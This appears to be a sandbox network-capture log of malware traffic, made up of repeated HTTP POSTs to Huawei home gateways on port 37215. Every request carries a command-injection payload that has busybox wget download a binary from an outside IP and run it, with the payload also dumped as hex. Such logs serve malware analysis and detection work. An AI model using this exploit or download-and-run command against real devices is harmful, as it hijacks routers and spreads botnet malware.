                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.234167099 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      20192.168.2.143712241.141.203.15837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.656538010 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.234165907 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      21192.168.2.143533441.139.155.24937215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.661189079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.234167099 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      22192.168.2.1453982102.11.129.7637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.663959026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.234164000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      23192.168.2.1437954102.32.214.13537215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.665501118 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.234169006 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      24192.168.2.1446072156.162.207.12137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.673188925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.035834074 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
